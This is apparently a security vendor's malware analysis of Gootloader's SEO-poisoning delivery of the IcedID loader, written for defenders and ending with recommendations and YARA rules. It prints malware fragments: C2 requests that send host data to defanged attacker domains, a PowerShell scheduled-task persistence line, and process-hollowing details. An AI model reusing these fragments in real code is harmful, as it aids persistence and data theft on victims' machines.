eSentire Threat Intelligence Malware Analysis: Gootloader and IcedID

Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning to distribute malicious payloads, such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it’s a stealthier option compared to Cobalt Strike.

In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID onto a law firm’s IT environment via an employee’s computer. However, our team of 24/7 Cyber SOC Analysts immediately isolated the infected endpoint and worked with TRU to diagnose the malware as IcedID after cleaning the endpoint.

This malware analysis is a deeper technical dive of how Gootloader and IcedID are deployed and our security recommendations to protect your organization from being exploited.

Case Study

eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file. The ZIP archive contains the JavaScript malicious file that is responsible for reaching out to one of three hardcoded domains to retrieve the second-stage payload.

Gootloader and IcedID Technical Analysis

As mentioned previously, the infection starts when a user visits an infected website and downloads a ZIP archive which contains a highly obfuscated malicious JavaScript file. The filename in most cases includes the keyword “agreement”. Gootloader leverages SEO poisoning to deliver the initial payload as shown in Exhibit 1.

When visiting one of the many compromised websites, the user is served with a Gootloader landing page that includes the link to the malicious ZIP archive (Figure 2). Since the user’s location and browser information is recorded during the visit, if the user visits a subsequent infected webpage, they will not be served with another Gootloader payload.

The JavaScript file within the ZIP archive decodes itself during the runtime and reaches out to one of the three hardcoded compromised websites.

The script checks if the infected host is a part of the Active Directory domain by using the environment variable %USERDNSDOMAIN%, the variable contains the FQDN (fully qualified domain name) of the computer. If the infected host successfully logs on to one of the malicious domains, the value “4173581” appends to the URL GET request that gets sent to the C2 server. If one of the C2 servers provided in the L parameter doesn’t respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts to connect to the next URL (Exhibit 3).

The GET request (on a domain joined machine):

GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1
Connection: Keep-Alive
Accept: */*    
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www[.]liveshopping-aktuell[.]de

Upon the successful communication with the C2 channel, Gootloader serves the second-stage payloads to the infected host from one of the infected websites in less than 2 minutes from the execution of the JavaScript file. The first main encoded payload is written to the registry key under HKEY_CURRENT_USER\SOFTWARE\Microsoft\username\ via Wscript process using RegWrite Method (Exhibits 4-5).

The second payload is written to HKEY_CURRENT_USER\SOFTWARE\Microsoft\username0\ (Exhibit 6). The payload is a 32-bit DLL (Dynamic Link Library) written in C# and is named as powershell.dll. The C# payload is responsible for decoding the main payload by replacing the ASCII characters with numeric values within Test() Class (Exhibit 7).

eSentire TRU previously observed Gootloader writing Cobalt Strike payloads under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username0\ and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username\ registry keys.

Gootloader uses process hollowing techniques (i.e., replacing the legitimate executable section of the process with a malicious code by hollowing or unmapping its memory) to inject the main payload into the PowerShell process via Foad() Class using APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory and ResumeThread as shown in Exhibit 8. Previously, GootLoader was observed to inject the payloads into ImagingDevice.exe process.

In some cases, we have observed the scheduled task is created as a persistence mechanism to decode the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in-memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).

The following code block responsible for creating the scheduled task (the scheduled task is named after the username):

$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac 
(New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))

eSentire TRU was able to identify the main payload as IcedID.

IcedID Analysis

The sample was compiled on May 25^th, 2022, which was 5 days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd). The executable was compiled using MingW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).

IcedID performs anti-VM/anti-sandboxing techniques to check if it’s running in a sandbox environment using RDTSC (Read Time Stamp Counter) instruction to get a processor’s time stamp counter as well as CPUID, SwitchToThread instructions with a loop for an accurate measurement during the calculation of the execution times (Exhibit 11).

IcedID gathers the information on the infected machine and transfers it via the Cookie parameter with GET request as shown below:

GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472
Host: ilekvoyn[dot]com

Breakdown of the Cookie parameters:

• __gads – retrieves IcedID campaign ID (it’s worth noting that the campaign IDs from the extracted configuration are different from the one that gets sent out to the C2), the flag, the number of milliseconds that have elapsed since system startup (using GetTickCount function) and system information (using ZwQuerySystemInformation).
• __gat – the OS version (retrieves using RtlGetVersion function) as shown in Exhibit 12.





• _ga – retrieves the process information using CPUID function and Hypervisor Vendor information as shown in Exhibit 13.





• _u – retrieves the computer name and username via GetComputerNameExW and GetUserNameW functions and stores them in the hexadecimal format (Exhibit 14).
• __io – retrieves the user security identifier (SID).





• _gid – gets the network adapter information via GetAdaptersInfo (Exhibit 15).

After successfully connecting to the C2 server, IcedID drops the payload in ProgramData folder (Exhibits 16-17).

As we can see, the unpacked IcedID payload is relatively small, but it contains the capabilities that threat actor(s) need to deploy a secondary payload from the C2 server. IcedID was observed to deliver Cobalt Strike, Conti ransomware, Quantum ransomware, and XingLocker ransomware in the past.

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:

• Implementing threat detections and BlueSteel, our machine- learning powered PowerShell classifier, to identify malicious command execution and exploitation attempts and ensure that eSentire has visibility, and detections are in place across eSentire MDR for Endpoint and MDR for Network.
• Performing global threat hunts for indicators associated with Gootloader and IcedID.

Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU) 

We recommend implementing the following controls to help secure your organization against Gootloader and Iced ID malware:

• Implement a Phishing and Security Awareness Training (PSAT) program that educates & informs employees on emerging threats in the threat landscape.
• Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.

• Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, implementing Least-Privilege administrative models.
• Ensure standard procedures are in place for employees to submit potentially malicious content for review.

While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.

Appendix

• https://www.esentire.com/blog/gootloader-initial-access-as-a-service-malware-expands-its-payloads-yet-again-infecting-law-firm-with-icedid
• https://attack.mitre.org/techniques/T1055/012/
• https://docs.microsoft.com/en-us/windows/win32/api/
• https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes
• https://thedfirreport.com/2021/05/12/conti-ransomware/
• https://thedfirreport.com/2022/04/25/quantum-ransomware/
• https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
• https://www.sentinelone.com/labs/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/

Indicators of Compromise

Yara Rules

Yara Rules

rule gootloader_JS {
  meta:
        description = "Detects Gootloader JavaScript file"
        author = "eSentire TI"
        date = "06/13/2022"
  strings:
        $a = "w+"
        $a1 = "x\\"
        $a2 = "Sp"
        $a3 = "E\\"
        $a4 = "function"
        $a5 = "while"
  condition:
        all of ($a*) and filesize < 300KB
    }

rule IcedID_loader {
  meta:
        description = "Detects IcedID loader"
        author = "eSentire TI"
        date = "06/13/2022"
        
  strings:
        $a = "oCookie: _s=" wide fullword nocase
        $a1 = "Cookie: __gads=" wide fullword nocase
        $a2 = "oCookie: _s=" wide fullword nocase
        $a3 = "__io=" wide fullword nocase
        $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C}
        $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D}
        $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D}
        $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D}
  condition:
        all of ($a*) and filesize < 20KB
    }